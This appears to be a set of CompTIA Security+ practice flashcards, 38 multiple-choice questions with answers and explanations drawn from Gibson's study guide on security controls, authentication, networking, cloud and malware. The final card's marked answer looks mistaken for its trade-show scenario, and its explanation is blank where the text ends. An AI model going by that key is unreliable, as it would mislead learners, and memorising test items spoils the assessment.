CompTIA Security+ Get Certified Get Ahead - PRE Assessment Exam Flashcards

1
Q

Your organization is planning to expand the data center to support more systems. Management wants the plan to focus on resiliency and uptime. Which of the following methods would best support these goals? (Choose TWO)

UPS
Cold site
NIC teaming
Off-site backups

A

UPS (Uninterruptible Power Supply)
NIC Teaming (Network Interface Card)

Explanation:
An uninterruptible power supply (UPS) and network interface card (NIC) teaming support resiliency and uptime goals. The UPS ensures the system stays up if power is lost. NIC teaming automatically recovers if one of the NICs or NIC inputs fail. Resiliency methods help systems heal themselves and recover from faults automatically.

A cold site cannot take over automatically and is not quick.
Off-site backups would need to be retrieved and applied by a person, so they aren’t automatic. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 123-124). YCDA, LLC. Kindle Edition.

2
Q

You are tasked with improving the overall security of several Servers in your data center. Which of the following are preventive controls that will assist with this goal? (Choose TWO)

Disabling unnecessary services.
Adding Cable Locks
Monitoring Logs on SIEM Systems
Implementing a Backup Plan
Closing unneeded ports.

A

Disabling unnecessary services.
Closing unneeded ports.

Explanation:
Disabling unnecessary services and closing unneeded ports are steps you can take to harden a server. They are preventive controls because they help prevent an incident.

Cable locks are a type of physical control and are typically used on laptops, not on servers.
Monitoring logs on security information and event management (SIEM) systems is a detective control.
A backup plan is a corrective control. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 123-124). YCDA, LLC. Kindle Edition.

3
Q

Your organization houses a Server room, and management wants to increase the Server room Security. You are tasked with identifying some deterrent controls that can be implemented to protect it. Which of the following choices would BEST meet this objective?

Hardware Locks
Data Encryption
a Vulnerability Assessment
Backups

A

Hardware Locks

Explanation:
Hardware locks are deterrent controls because they would deter someone from entering or accessing the servers in bays if bay door locks are used. They are also examples of physical controls.

None of the other answers increase the security of the server room.
Data encryption is a technical control designed to protect data on the servers.
A vulnerability assessment is a managerial control designed to discover vulnerabilities.
Backups are corrective controls designed to reverse the impact of data loss or corruption. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 124). YCDA, LLC. Kindle Edition.

4
Q

You suspect that a Linux computer is establishing connections with a remote server on the Internet without any user interaction. You want to verify this by viewing a summary of protocol statistics on a Linux System. Which of the following commands would you use?

dig
nslookup
ifconfig
netstat

A

netstat

Explanation:
The netstat -s command will display a summary of protocol statistics on a Linux system.

You can use the dig (short for domain information groper) command on Linux systems to query Domain Name System (DNS) servers and verify if you can resolve names to IP addresses.
The nslookup (short for name server lookup) command can also be used to query DNS servers.
The ifconfig command is used to display information and configure network interfaces on Linux systems. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 124). YCDA, LLC. Kindle Edition.

5
Q

You are using a Linux computer to monitor Network traffic. After connecting your computer to the mirror port of a Switch, you started logging software on the computer. However, you discover that the only traffic being collected is traffic to or from the Linux computer. You want to collect all traffic going through the Switch. Which of the following actions should you take?

Run the command ifconfig eth0 promisc
Run the command ipconfig eth0 promisc
Connect the computer to a Router
Reconfigure the Switch

A

Run the command ifconfig eth0 promisc

Explanation:
You should run the command ifconfig eth0 promisc to enable promiscuous mode on eth0, the network interface card (NIC). Promiscuous mode allows a NIC to process all traffic it receives, instead of only traffic addressed to it.

The ipconfig command is used on Windows systems and doesn’t support this feature.
The scenario indicates she wants to collect traffic going through the switch, so connecting to a router isn’t necessary.
Port mirroring on a switch sends a copy of all traffic received by the switch to the mirror port. The scenario indicates this is configured, so the switch doesn’t need to be reconfigured. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 124-125). YCDA, LLC. Kindle Edition.

6
Q

You suspect that attackers have been performing a password spraying attack against a Linux Server. Which of the following would be the BEST method of confirming your suspicions?

Use the cat command to view the auth.log file.

Implement an Account Lockout Policy.

Salt passwords to prevent the success of the spraying attack.

Use the logger command to view unsuccessful logins.

A

Use the cat command to view the auth.log file.

Explanation:
The cat command (short for concatenate) displays the entire contents of a file and the auth.log file shows all unsuccessful (and successful) logins, and this is the only choice of the available answers that confirms past activity.

An account lockout policy locks an account after too many incorrect passwords within a certain time frame, but a spraying attack uses a time lapse between each password attempt to bypass an account lockout policy.
Salting passwords is often used to prevent rainbow table-based attacks, but salts aren’t effective against spraying attacks.
The logger command is used to add log entries into the syslog file but doesn’t examine log entries. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 125). YCDA, LLC. Kindle Edition.

7
Q

Your Network includes dozens of Servers. Administrators in your organization are having problems aggregating and correlating the logs from these Servers. Which of the following provides the BEST solution for these problems?

SIEM
Syslog
NetFlow
sFlow

A

SIEM (Security Information and Event Management)

Explanation:
A security information and event management (SIEM) system collects, aggregates, and correlates logs from multiple sources.

Syslog is a protocol that specifies log entry formats that many SIEMs use. It is also the name of a log on Linux systems.
NetFlow is a network protocol (developed by Cisco) used to collect and monitor network traffic.
The sFlow (short for sampled flow) protocol is used to collect a sampling of network traffic for monitoring. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 125). YCDA, LLC. Kindle Edition.

8
Q

You are comparing different types of Authentication. Of the following choices, which one uses Multifactor Authentication?

A system that requires users to enter a Username and Password.

A system that checks an employee’s Fingerprint and does a vein scan.

A Cipher Door Lock that requires employees to enter a code to open the door.

A system that requires users to have a Smart Card and a PIN.

A

A system that requires users to have a Smart Card and a PIN.

Explanation:
A system that requires users to have a smart card and a personal identification number (PIN) uses multifactor authentication or two-factor authentication. The card is in the something you have factor, and the PIN is in the something you know factor.

A username provides identification, and a password is in the something you know factor, providing single-factor authentication.
Fingerprints and vein scans are both in the something you are factor, providing single-factor authentication.
A code for a cipher door lock is in the something you know factor, providing single-factor authentication. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 125-126). YCDA, LLC. Kindle Edition.

9
Q

The Chief Information Officer (CIO) at your organization suspects someone is entering the data center after normal working hours and stealing sensitive data. Which of the following actions can prevent this?

Upgrade the CCTV System.

Require Smart Cards to enter the data center.

Implement time-based logins.

Enable advanced auditing.

A

Implement time-based logins.

Explanation:
Time-based logins (sometimes called time-of-day restrictions) would prevent this. They would prevent anyone from logging in after normal working hours and accessing sensitive data.

All of the other answers can detect suspicious behavior, but they wouldn’t prevent the users from logging in after normal working hours and stealing the data. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 126). YCDA, LLC. Kindle Edition.

10
Q

A SQL Database server was recently attacked. Cybersecurity investigators discovered the attack was self-propagating through the Network. When it found the Database Server, it used well-known credentials to access the database. Which of the following would be the BEST action to prevent this from occurring again?

Change the default application password.
This describes a worm.
Implement 2FA
Conduct a code review.

A

Change the default application password.

Explanation:
The default application password for the SQL server should be changed. Some SQL Server software implementations can have a default blank password for the SA account (the System Administrator account), and these default credentials are well-known.

While the scenario describes a worm because it is self-propagating, the question is asking for the best preventive action to take.
Using two-factor authentication (2FA) is a good practice for users, but it isn’t always feasible for application passwords.
A code review can detect flaws and vulnerabilities in internally developed applications, but SQL Server is Microsoft software. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 126). YCDA, LLC. Kindle Edition.

11
Q

You are reviewing Security Controls and their usefulness. You notice that account lockout policies are in place. Which of the following attacks will these policies thwart? (Choose TWO)

Brute Force
DNS Poisoning
Dictionary
Replay
Buffer Overflow

A

Brute Force
Dictionary

Explanation:
Brute force and dictionary attacks attempt to guess passwords, but an account lockout control locks an account after the wrong password is guessed too many times.

The other attacks are not password attacks, so they aren’t mitigated using account lockout controls.
Domain Name System (DNS) poisoning attempts to redirect web browsers to malicious URLs.
Replay attacks attempt to capture packets to impersonate one of the parties in an online session.
Buffer overflow attacks attempt to overwhelm online applications with unexpected code or data. See Chapters 2 and 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 126-127). YCDA, LLC. Kindle Edition.

12
Q

** IT Administrators created a VPN for employees to use while working from home. The VPN is configured to provide AAA services. Which of the following would be presented to the AAA system for identification?

Password
Permissions
Username identification
Tunneling Certificate
Hardware Token

A

Username identification

Explanation:
Users would typically enter a username as identification for an authentication, authorization, and accounting (AAA) system.

Users would provide a password as proof that the claimed identity (the username) is theirs. The password provides authentication.
Users are assigned permissions based on their proven identity, but the permissions do not provide authentication.
The virtual private network (VPN) would encrypt traffic sent via the VPN tunnel, and this traffic may be encrypted with the use of a certificate. However, this is not called a tunneling certificate, and the certificate used for encryption does not provide identification.
A hardware token is often used as an additional method of authentication, but it does not provide identification. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 127). YCDA, LLC. Kindle Edition.

13
Q

After a recent attack, Security investigators discovered that attackers logged on with an Administrator account. They recommend implementing a solution that will thwart this type of attack in the future. The solution must support the following requirements:

Allow authorized users to access the Administrator account without knowing the password.
Allow authorized users to check out the credentials when needed.
Log each time the credentials are used.
Automatically change the password.

Which of the following answers would meet these requirements?

Privileged Access Management
OpenID Connect
MAC Scheme
MFA

A

Privileged Access Management

Explanation:
A privileged access management system protects and limits access to privileged accounts such as administrator accounts.

OpenID Connect is used for authentication and authorization on the Internet, not internal networks.
A mandatory access control (MAC) scheme uses labels to control access, but it isn’t used to control access to administrator accounts.
Multifactor authentication (MFA) uses more than one factor of authentication, but it doesn’t meet any of the requirements of this scenario. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 127). YCDA, LLC. Kindle Edition.

14
Q

** Lisa wants to implement a Secure Authentication system on a website. However, instead of collecting and storing user passwords, she wants to use a third-party system. Which of the following is the BEST choice to meet this goal?

SAML
Kerberos
SSH
OAuth

A

SAML (Security Assertion Markup Language)

Explanation:
Security Assertion Markup Language (SAML) is a single sign-on (SSO) solution that can use third-party websites, and it provides authentication.

Kerberos is an SSO solution used on internal networks such as in Microsoft Active Directory domains.
Secure Shell (SSH) is used for remote administration.
OAuth (think of this as Open Authorization) is used for authorization, but the scenario wants a solution for authentication. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 127-128). YCDA, LLC. Kindle Edition.

15
Q

Your organization is implementing an SDN. Management wants to use an access control scheme that controls access based on attributes. Which of the following is the BEST solution?

DAC
MAC
Role-BAC
ABAC

A

ABAC (Attribute-based Access Control)

Explanation:
A software-defined network (SDN) typically uses an attribute-based access control (ABAC) scheme. The ABAC scheme is based on attributes that identify subjects and objects within a policy.

A discretionary access control (DAC) scheme has an owner, and the owner establishes access for the objects.
A mandatory access control (MAC) scheme uses labels assigned to subjects and objects.
A role-based access control scheme uses roles or groups to assign rights and permissions. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 128). YCDA, LLC. Kindle Edition.

16
Q

Lisa uses a Linux system to regularly connect to a remote Server named gcga with a Secure SSH connection. However, the SSH account has a complex password, and she wants to avoid using it without sacrificing Security. Which of the following commands would she use as a FIRST step when creating a password-less login with the remote system?

ssh-copy-id -i ~/.ssh/id_rsa.pub lisa@gcga
chmod 644 ~/.ssh/id_rsa
ssh-keygen -t rsa
ssh root@gcga

A

ssh-keygen -t rsa

Explanation:
The first step would be to enter ssh-keygen -t rsa at the terminal. This creates an RSA-based key pair (a private key and a public key). The public key’s location and name is ~/.ssh/id_rsa.pub, and the private key’s location and name is ~/.ssh/id_rsa. The second step is to copy the public key to the remote server using the command ssh-copy-id -i ~/.ssh/id_rsa.pub lisa@gcga.

The private key should always stay private, but the chmod 644 command makes it readable by everyone, so it shouldn’t be used.
The ssh command connects to the remote server using Secure Shell (SSH). If the key pair is in place, it would use the key pair for authentication and not require the complex password.
The ssh-keygen command is a utility within the OpenSSH suite of tools. See Chapter 3.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 128). YCDA, LLC. Kindle Edition.

17
Q

Your organization plans to deploy a Server in the screened subnet that will perform the following functions:

Identify Mail Servers
Provide Data Integrity
Prevent Poisoning Attacks
Respond to requests for A and AAAA records

Which of the following will BEST meet these requirements?

DNS
DNSSEC
TLS
ESP

A

DNSSEC (Domain Name System Security Extensions)

Explanation:
Domain Name System Security Extensions (DNSSEC) add security to DNS systems and can prevent DNS poisoning attacks by adding data integrity to DNS records.

The functions in the list indicate that the server in the screened subnet (sometimes called a demilitarized zone or DMZ) is a DNS server, but for the DNS server to provide data integrity and prevent DNS poisoning, it needs DNSSEC. DNSSEC uses a Resource Record Signature (RRSIG), commonly referred to as a digital signature, to provide data integrity and authentication for DNS replies.
RRSIG can use Transport Layer Security (TLS) to create the signature, but TLS by itself doesn’t provide the required protection.
Internet Protocol security (IPsec) uses Encapsulating Security Payload (ESP) to encrypt data. See Chapter 3.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 129). YCDA, LLC. Kindle Edition.

18
Q

Bart incorrectly wired a Switch in your organization’s Network. It effectively disabled the Switch as though it was a victim of a Denial-of-Service Attack. Which of the following should be done to prevent this situation in the future?

Install an IDS
Only use Layer 2 Switches
Install SNMPv3 on the Switches
Implement STP or RSTP

A

Implement STP or RSTP (Spanning Tree Protocol or Rapid Spanning Tree Protocol)

Explanation:
Spanning Tree Protocol (STP) and Rapid STP (RSTP) both prevent switching loop problems. It’s rare for a wiring error to take down a switch. However, if two ports on a switch are connected to each other, it creates a switching loop and effectively disables the switch.

An intrusion detection system (IDS) will not prevent a switching loop.
Layer 2 switches are susceptible to this problem.
Administrators use Simple Network Management Protocol version 3 (SNMPv3) to manage and monitor devices, but it doesn’t prevent switching loops. See Chapter 3.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 129). YCDA, LLC. Kindle Edition.

19
Q

Maggie is a sales rep for a software company. While in a coffee shop, she uses her laptop to connect to the public WIFI, check her work emails, and upload details of a recent sale. Which of the following would she use to prevent other devices on the public Network from accessing her laptop? (Choose the BEST TWO Choices)

TPM
HSM
Firewall
DLP
VPN

A

Firewall
VPN (Virtual Private Network)

Explanation:
A firewall and a virtual private network (VPN) would prevent other devices from accessing her laptop. A host-based firewall provides primary protection. The VPN encrypts all of her Internet-based traffic going over the public Wi-Fi.

A Trusted Platform Module (TPM) provides full drive encryption and would protect the data if someone accessed the laptop, but it doesn’t prevent access.
A hardware security module (HSM) is a removable device that can generate and store RSA keys used with servers.
A data loss prevention (DLP) device helps prevent unauthorized data from leaving a network, but it doesn’t prevent access. See Chapter 3.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 129-130). YCDA, LLC. Kindle Edition.

20
Q

Your organization wants to combine some of the Security Controls used to control incoming and outgoing Network traffic. At a minimum, the solution should include Stateless Inspection, Malware Inspection, and a Content Filter. Which of the following BEST meets this goal?

VLAN
NAT
UTM
DNSSEC
WAF

A

UTM (Unified Threat Management)

Explanation:
A unified threat management (UTM) device is an advanced firewall and combines multiple security controls into a single device such as stateless inspection, malware inspection, and a content filter. None of the other answers include these components.

You can configure a virtual local area network (VLAN) on a switch to provide network segmentation.
Network Address Translation (NAT) translates public IP addresses to private IP addresses and private addresses back to public IP addresses.
Domain Name System Security Extensions (DNSSEC) is a suite of extensions for DNS that provides validation for DNS responses.
A web application firewall (WAF) protects a web server from Internet-based attacks. See Chapter 3.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 130). YCDA, LLC. Kindle Edition.

21
Q

Administrators are deploying a new Linux Server in the screened subnet. After it is installed, they want to manage it from their desktop Computers located within the organization’s Private Network. Which of the following would be the BEST choice to meet this need?

Forward Proxy Server
Reverse Proxy Server
Web Application Firewall
Jump Server

A

Jump Server

Explanation:
A jump server is a server placed between different security zones, such as an internal network and a screened subnet (sometimes called a demilitarized zone or DMZ) and is used to manage devices in the other security zone. In this scenario, administrators could connect to the jump server with Secure Shell (SSH) and then connect to the Linux server using SSH forwarding on the jump server.

A forward proxy server (often called a proxy server) is used by internal clients to access Internet resources, not resources in the screened subnet.
Reverse proxy servers accept traffic from the Internet, not the internal network, and forward the traffic to one or more internal web servers.
A web application firewall (WAF) protects a web server from Internet-based attacks but isn’t used to control traffic between an internal network and the screened subnet. See Chapter 3.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 130-131). YCDA, LLC. Kindle Edition.

22
Q

Attackers have recently launched several attacks against Servers in your organization’s DMZ. You are tasked with identifying a solution that will have the best chance at preventing these attacks in the future. Which of the following is the BEST choice?

Anomaly-based IDS
Inline IPS
Passive IDS
Signature-based IDS

A

Inline IPS (Intrusion Prevention System)

Explanation:
The best solution of the given choices is an in-band intrusion prevention system (IPS). Traffic goes through the IPS, and the IPS can prevent attacks from reaching internal systems.

An intrusion detection system (IDS) is passive and not inline, so it can only detect and react to the attacks, not block them.
A signature-based IDS can detect known attacks based on the attack’s signature, but there isn’t any indication that the past attacks were known. See Chapter 4.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 131). YCDA, LLC. Kindle Edition.

23
Q

A coffee shop recently stopped broadcasting the SSID (coffeewifi) for its Wireless Network. Instead, paying customers can view it on their receipt and use it to connect to the coffee shop’s Wireless Network. Today, Lisa turned on her laptop computer, saw the SSID (coffewifi), and connected to it. Which of the following attacks is MOST likely occurring?

Rogue AP
Evil Twin
Jamming
Bluejacking

A

Evil Twin

Explanation:
An evil twin is a rogue access point (AP) with the same or similar service set identifier (SSID) as a legitimate access point. The actual SSID coffeewifi has broadcasting turned off, but the evil twin SSID of coffewifi is broadcasting, allowing users to see it.

While it is also a rogue AP, evil twin is a more accurate answer since it is similar to the actual SSID.
Jamming typically prevents anyone from connecting to a wireless network.
Bluejacking is related to Bluetooth, not wireless networks. See Chapter 4.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 131). YCDA, LLC. Kindle Edition.

24
Q

** Before personnel can enter a Secure area, they must first place their smartphones in one of several conductive metal lockboxes. The company implemented this policy because management is concerned about risks related to intellectual property. Which of the following represents the GREATEST risk to intellectual property that this policy will mitigate?

Bluesnarfing
Theft of the Smartphones
Data exfiltration over a Mobile Hotspot
To enable Geofencing

A

Bluesnarfing

Explanation:
This policy will prevent bluesnarfing, which is the unauthorized access of information from a wireless device through a Bluetooth connection.

The conductive metal lockboxes act as a small Faraday cage and will block Bluetooth signals.
While the lockboxes will help prevent theft, there’s no need to pay extra for conductive lockboxes if theft is the greatest risk.
Hotspots are typically in public locations. A company would set up a network providing Wi-Fi access, not a hotspot.
Geofencing creates a virtual fence using GPS, but devices within a Faraday cage wouldn’t be able to reach GPS. See Chapter 4.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 131). YCDA, LLC. Kindle Edition.

25
Q

Administrators are designing a site-to-site VPN between offices in two different cities. Management mandated the use of Certificates for mutual Authentication. Additionally, they want to ensure that internal IP Addresses are not revealed. Which of the following is the BEST choice to meet these requirements?

IPsec VPN using Tunnel Mode
IPsec VPN using Transport Mode
L2TP VPN
VLAN VPN

A

IPsec VPN using Tunnel Mode

Explanation:
Internet Protocol security (IPsec) using Tunnel mode is the best choice of the available answers. IPsec provides mutual authentication, and Tunnel mode will encrypt both the payload and the packet headers, hiding the internal IP addresses.

Transport mode will encrypt the payload only, leaving the internal IP addresses exposed.
A VPN using Layer 2 Tunneling Protocol (L2TP) only doesn’t provide any encryption.
Virtual local area networks (VLANs) provide network segmentation but can’t be used as a VPN. See Chapter 4.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 132). YCDA, LLC. Kindle Edition.

26
Q

** Network Administrators are considering adding an HSM to a Server in your Network. What functions will this add to the Server?

Provide full drive Encryption

Reduce the Risk of employees emailing confidential information outside the organization.

Provide Webmail to Clients

Generate and store Keys used with Servers.

A

Generate and store Keys used with Servers

Explanation:
A hardware security module (HSM) is a removable device that can generate and store RSA keys used with servers.

The keys can be used to encrypt data sent to and from the server, but they wouldn’t be used for full drive encryption.
A Trusted Platform Module (TPM) provides full drive encryption and is included in many laptops.
A data loss prevention (DLP) device is a device that can reduce the risk of employees emailing confidential information outside the organization.
Software as a Service (SaaS) provides software or applications, such as webmail, via the cloud. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 132). YCDA, LLC. Kindle Edition.

27
Q

** Bart needs to send an email to his supervisor with an attachment that includes sensitive information. He wants to maintain the confidentiality of this information. Which of the following choices is the BEST choice to meet this need?

Digital Signature
Encryption
Data Masking
Hashing

A

Encryption

Explanation:
Encryption is the best choice to provide confidentiality of any type of information, including sensitive information.

A digital signature provides integrity, non-repudiation, and authentication.
Data masking modifies the original data, producing data that looks valid but is not authentic.
Hashing provides integrity. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 132). YCDA, LLC. Kindle Edition.

28
Q

The Springfield school system stores some data in the Cloud using its own resources. The Shelbyville Nuclear Power Plant also stores some data in the Cloud using its own resources. Later, the two organizations decide to share some data in both Clouds for educational purposes. Which of the following BEST describes the Cloud created by these two organizations?

Community
Private
Public
XaaS

A

Community

Explanation:
They created a community cloud. In the scenario, the two organizations have a common goal of sharing educational materials.

The individual clouds created by each organization are private clouds, but the shared community cloud resources are not private.
A public cloud would be available to anyone, but the scenario wants to restrict access to just two organizations.
Anything as a Service (XaaS) refers to cloud services beyond IaaS, PaaS, and SaaS. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 132-133). YCDA, LLC. Kindle Edition.

29
Q

Your organization is planning to implement a CYOD deployment model. You’re asked to provide input for the new policy. Which of the following concepts are appropriate for this policy?

SCADA Access
Storage Segmentation
Database Security
Embedded RTOS

A

Storage Segmentation

Explanation:
Storage segmentation creates separate storage areas in mobile devices and can be used with a choose your own device (CYOD) mobile device deployment model where users own their devices.

None of the other answers are directly related to mobile devices.
A supervisory control and data acquisition (SCADA) system controls industrial control systems (ICSs), such as those used in nuclear power plants or water treatment facilities, and SCADA systems should be isolated.
Database security includes the use of permissions and encryption to protect data in a database but is unrelated to mobile device deployment.
Some embedded systems use a real-time operating system (RTOS) when the system must react within a specific time. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 133). YCDA, LLC. Kindle Edition.

30
Q

Your organization plans to implement desktops via the Cloud. Each desktop will include an operating system and a core group of applications needed by employees, and the Cloud provider will manage the desktops. Employees with Internet access will be able to access these desktops from anywhere and almost any device. Which of the following BEST identifies this service?

IaaS
CASB
SaaS
XaaS

A

XaaS (Anything as a Service)

Explanation:
Anything as a Service (XaaS) refers to cloud services beyond IaaS, PaaS, and SaaS. It would include desktops as a service.

Infrastructure as a Service (IaaS) is a cloud computing option where the vendor provides access to a computer, but customers must install the operating system and maintain the system.
A cloud access security broker (CASB) is a software tool used to provide additional security for cloud resources, but it doesn’t provide the underlying cloud services.
Software as a Service (SaaS) provides access to specific applications such as an email application, but not entire desktops. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 133). YCDA, LLC. Kindle Edition.

31
Q

A small business owner has asked you for advice. She wants to improve the company’s Security posture, but she doesn’t have any Security staff. Which of the following is the BEST solution to meet her needs?

SOAR
MSSP
SaaS
XaaS

A

MSSP (Managed Security Service Provider)

Explanation:
A managed security service provider (MSSP) is a third-party vendor that provides security services for an organization, and it is the best solution for this scenario.

A Security Orchestration, Automation, and Response (SOAR) solution automates incident response for some events, but it will augment services already provided by security staff within an organization. SOAR would not work here because the small business doesn’t have any security staff.
Software as a Service (SaaS) includes any software or application provided to users over a network such as the Internet.
Anything as a Service (XaaS) refers to cloud services beyond SaaS, IaaS, and PaaS. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 133-134). YCDA, LLC. Kindle Edition.

32
Q

Management at the Goody New Shoes retail chain decided to allow employees to connect to the internal Network using their personal mobile devices. However, the organization is having problems with these devices, including the following:

Employees do not keep their devices updated.
There is no standardization among the devices.
The organization doesn’t have adequate control over the devices.

Management wants to implement a mobile device deployment model to overcome these problems while still allowing employees to use their own devices. Which of the following is the BEST choice?

BYOD
COPE
CYOD
IaaS

A

CYOD (Choose Your Own Device)

Explanation:
A choose your own device (CYOD) mobile device deployment model includes a list of acceptable devices that employees can purchase and connect to the network. IT management can then implement a mobile device management (MDM) system to provide standardized management for these devices.

The current policy is a bring your own device (BYOD) policy, but because of the lack of standardization, it’s difficult for IT departments to adequately manage the devices and ensure they don’t introduce vulnerabilities to the network.
A corporate-owned personally enabled (COPE) policy indicates the organization owns the devices, not the employees.
Infrastructure as a Service (IaaS) is a cloud computing option where the vendor provides access to a computer, but customers must install the operating system and maintain the system. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 134). YCDA, LLC. Kindle Edition.

33
Q

During a vulnerability scan, you discover some new systems in the Network. After investigating this, you verify that these systems aren’t authorized because someone installed them without going through a standard approval process. What does this describe?

Hactivist
Script Kiddie
Shadow IT
Authorized Hacker

A

Shadow IT

Explanation:
Shadow IT refers to any systems or applications installed on a network without authorization or approval. Employees often add them to bypass security controls.

A hacktivist launches attacks as part of an activist movement or to further a cause.
A script kiddie is an attacker who uses existing computer scripts or code to launch attacks and typically has limited technical skills.
An authorized hacker (sometimes referred to as a white hat attacker) is a security professional working within the law to protect an organization from attackers. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 134-135). YCDA, LLC. Kindle Edition.

34
Q

Homer recently received a Phishing email with a malicious attachment. He was curious so he opened it to see what it was. It installed Malware on his system, and quickly spread to other systems in the Network. Security investigators discovered that the malware exploited a vulnerability that wasn’t previously known by any trusted sources. Which of the following BEST describes this attack?

Open Source Intelligence
Zero-Day
Hoax
DDoS

A

Zero-Day

Explanation:
A zero-day exploit is one that isn’t known by trusted sources such as antivirus vendors or operating system vendors.

Attackers use open source intelligence to identify a target. Some typical sources are social media sites and news outlets.
A hoax is not a specific attack. It is a message, often circulated through email, that tells of impending doom from a virus or other security threat that simply doesn’t exist.
A distributed denial-of-service (DDoS) attack comes from multiple sources, not as a single phishing email. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 135). YCDA, LLC. Kindle Edition.

35
Q

** Lisa completed an antivirus scan on a Server and detected a Trojan. She removed the Trojan but was concerned that unauthorized personnel might still be able to access data on the Server and decided to check the Server further. Of the following choices, what is she MOST likely looking for on this Server?

Backdoor
Logic Bomb
Rootkit
Botnet

A

Backdoor

Explanation:
She is most likely looking for a backdoor because Trojans commonly create backdoors, and a backdoor allows unauthorized personnel to access data on the system.

Logic bombs and rootkits can create backdoor accounts, but Trojans don’t create logic bombs and would rarely install a rootkit.
The computer might be joined to a botnet, but a botnet is a group of computers. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 135). YCDA, LLC. Kindle Edition.

36
Q

Some Network appliances monitoring incoming data have recently started sending alerts on potentially malicious files. You discover that these are PE32 files with the tar.gz extension, and they are being downloaded to several user systems. After investigating further, you discover these users previously opened an email with an infected MHT file. Which of the following answers BEST describes this scenario?

The systems have joined a Botnet.
Users installed Ransomware.
Users installed a RAT, and it is downloading additional tools.
Shadow IT is running in the Network.

A

Users installed a RAT, and it is downloading additional tools.

Explanation:
This indicates that users installed a remote access Trojan (RAT) when they opened the email containing the malicious MHT file. An MHT file (or MHTML) is a webpage archive, and it will store HTML, CSS, images, JavaScript, and anything else in the webpage. After installing the RAT, attackers later began downloading Portable Executable (PE32) files to the compromised systems.

While the systems may have joined a botnet, the scenario doesn’t indicate that they are part of a botnet.
Ransomware would indicate that it has controlled the user’s computer or data, but this isn’t indicated in this scenario.
Shadow information technology (IT) refers to any unauthorized systems or applications within an organization. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 135). YCDA, LLC. Kindle Edition.

37
Q

Employees at the Marvin Monroe Memorial Hospital are unable to access any computer data. Instead, they occasionally see a message indicating that attackers encrypted all the data, and it would remain encrypted until the attackers received a hefty sum as payment. Which of the following BEST describes this attack?

Criminal Syndicate
Ransomware
Fileless Virus
Rootkit

A

Ransomware

Explanation:
The scenario describes ransomware, where attackers typically encrypt data and demand payment to release the data.

Although the attack might have been launched by a criminal syndicate because their motivation is primarily money, the question is asking about the attack, not the attacker.
A fileless virus injects code into existing scripts and may install ransomware, but a fileless virus is not ransomware.
A rootkit is a program or group of programs that provide root-level access to a system but hides itself to evade detection. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 136). YCDA, LLC. Kindle Edition.

38
Q

** A SIEM system is sending several alerts indicating Malware has infected several employee computers. After examining the border Firewall and NIDS Logs, IT personnel cannot identify malicious traffic entering the Network from the Internet. Additionally, they discover that all of these employees attended a trade show during the past two days. Which of the following is the MOST likely source of this Malware?

Fileless Virus embedded in a vCard
Malware on USB drives
Trojan delivered from a Botnet
Worms included in presentation media.

A

Fileless Virus embedded in a vCard

Explanation:
